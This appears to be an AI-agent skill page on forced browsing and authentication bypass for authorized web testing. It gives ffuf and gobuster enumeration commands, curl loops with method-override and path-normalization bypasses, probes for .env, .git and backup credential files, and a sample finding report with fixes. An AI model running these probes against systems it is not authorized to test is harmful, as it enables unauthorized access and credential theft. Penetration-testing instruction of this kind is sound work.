Loading...
Loading...
Discovering and accessing unprotected pages, APIs, and administrative interfaces by enumerating URLs and bypassing authentication controls during authorized security assessments.
npx skill4agent add mukul975/anthropic-cybersecurity-skills bypassing-authentication-with-forced-browsinggo install github.com/ffuf/ffuf/v2@latestapt install gobustergit clone https://github.com/danielmiessler/SecLists.git# Directory enumeration with ffuf
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-mc 200,301,302,403 \
-fc 404 \
-o results-dirs.json -of json \
-t 50 -rate 100
# File enumeration with common extensions
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
-e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.cfg,.conf,.env \
-mc 200,301,302,403 \
-fc 404 \
-o results-files.json -of json \
-t 50 -rate 100
# Gobuster for directory enumeration
gobuster dir -u https://target.example.com \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-s "200,204,301,302,307,403" \
-x php,asp,aspx,jsp,html \
-o gobuster-results.txt \
-t 50# Admin panel enumeration
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc 200,301,302 \
-t 50 -rate 100
# Common admin paths to check manually:
# /admin, /administrator, /admin-panel, /wp-admin
# /cpanel, /phpmyadmin, /adminer, /manager
# /console, /debug, /actuator, /swagger-ui
# /graphql, /graphiql, /.env, /server-status
# API endpoint discovery
ffuf -u https://target.example.com/api/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
-mc 200,201,204,301,302,401,403 \
-fc 404 \
-o api-results.json -of json
# Check for Spring Boot Actuator endpoints
for endpoint in env health info beans configprops mappings trace; do
curl -s -o /dev/null -w "%{http_code} /actuator/$endpoint\n" \
"https://target.example.com/actuator/$endpoint"
done# Test without authentication
curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/admin/dashboard"
# Test with valid session cookie
curl -s -o /dev/null -w "%{http_code}" \
-b "session=valid_session_token_here" \
"https://target.example.com/admin/dashboard"
# Automated check: compare response sizes
# Unauthenticated request
curl -s "https://target.example.com/admin/users" | wc -c
# Authenticated request
curl -s -b "session=valid_token" \
"https://target.example.com/admin/users" | wc -c
# If both return similar content, authentication is not enforced
# Test with Burp Intruder: send a list of discovered URLs
# without cookies and flag any 200 responses# Test different HTTP methods on protected endpoints
for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE; do
echo -n "$method: "
curl -s -o /dev/null -w "%{http_code}" \
-X "$method" "https://target.example.com/admin/settings"
done
# Test HTTP method override headers
curl -s -o /dev/null -w "%{http_code}" \
-X POST \
-H "X-HTTP-Method-Override: GET" \
"https://target.example.com/admin/settings"
curl -s -o /dev/null -w "%{http_code}" \
-H "X-Original-Method: GET" \
-H "X-Rewrite-URL: /admin/settings" \
"https://target.example.com/"# Path normalization bypass attempts
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/ADMIN/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/./dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/public/../admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin%2fdashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/;/admin/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin;anything/dashboard"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/.;/admin/dashboard"
# Double URL encoding
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/%2561dmin/dashboard"
# Trailing characters
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard/"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard.json"
curl -s -o /dev/null -w "%{http_code}" "https://target.example.com/admin/dashboard%00"# Backup file discovery
ffuf -u https://target.example.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt \
-e .bak,.old,.orig,.save,.swp,.tmp,.dist,.config,.sql,.gz,.tar,.zip \
-mc 200 -t 50 -rate 100
# Common sensitive files
for file in .env .git/config .git/HEAD .svn/entries \
web.config wp-config.php.bak config.php.old \
database.yml .htpasswd server-status phpinfo.php \
robots.txt sitemap.xml crossdomain.xml; do
status=$(curl -s -o /dev/null -w "%{http_code}" \
"https://target.example.com/$file")
if [ "$status" != "404" ]; then
echo "FOUND ($status): $file"
fi
done
# Git repository exposure check
curl -s "https://target.example.com/.git/HEAD"
# If this returns "ref: refs/heads/main", the git repo is exposed| Concept | Description |
|---|---|
| Forced Browsing | Directly accessing URLs that are not linked but exist on the server |
| Directory Enumeration | Brute-forcing directory and file names against a wordlist to discover hidden content |
| Authentication Bypass | Accessing protected resources without valid credentials due to missing access checks |
| Path Normalization | Exploiting differences in how web servers and application frameworks parse URL paths |
| Method-based Bypass | Using alternative HTTP methods (PUT, DELETE) that may not have authentication checks |
| Information Disclosure | Exposure of sensitive configuration files, backups, or debug interfaces |
| Defense in Depth | Layered security controls where authentication is enforced at multiple levels |
| Tool | Purpose |
|---|---|
| ffuf | Fast web fuzzer for directory, file, and parameter enumeration |
| Gobuster | Directory and DNS brute-forcing tool written in Go |
| Feroxbuster | Recursive content discovery tool with automatic recursion |
| DirBuster | OWASP Java-based directory brute-force tool with GUI |
| Burp Suite | HTTP proxy for request interception and automated scanning |
| SecLists | Comprehensive collection of wordlists for security testing |
/admin//api/v1/users/api/v1/settingsconfig.php.bak/actuator/env## Forced Browsing / Authentication Bypass Finding
**Vulnerability**: Missing Authentication on Administrative Interface
**Severity**: Critical (CVSS 9.1)
**Location**: /admin/dashboard (GET, no authentication required)
**OWASP Category**: A01:2021 - Broken Access Control
### Discovered Unprotected Resources
| Path | Status | Auth Required | Content |
|------|--------|---------------|---------|
| /admin/dashboard | 200 | No | Full admin panel |
| /admin/users | 200 | No | User management |
| /actuator/env | 200 | No | Environment variables |
| /config.php.bak | 200 | No | Database credentials |
| /.git/HEAD | 200 | No | Git repository metadata |
### Impact
- Unauthenticated access to administrative functions
- Ability to create, modify, and delete user accounts
- Exposure of database credentials and API keys
- Full source code disclosure via exposed Git repository
### Recommendation
1. Implement authentication checks at the server/middleware level for all admin routes
2. Remove backup files, debug endpoints, and version control metadata from production
3. Configure web server to deny access to sensitive file extensions (.bak, .old, .env, .git)
4. Implement IP-based access restrictions for administrative interfaces
5. Use a reverse proxy to restrict access to internal-only endpoints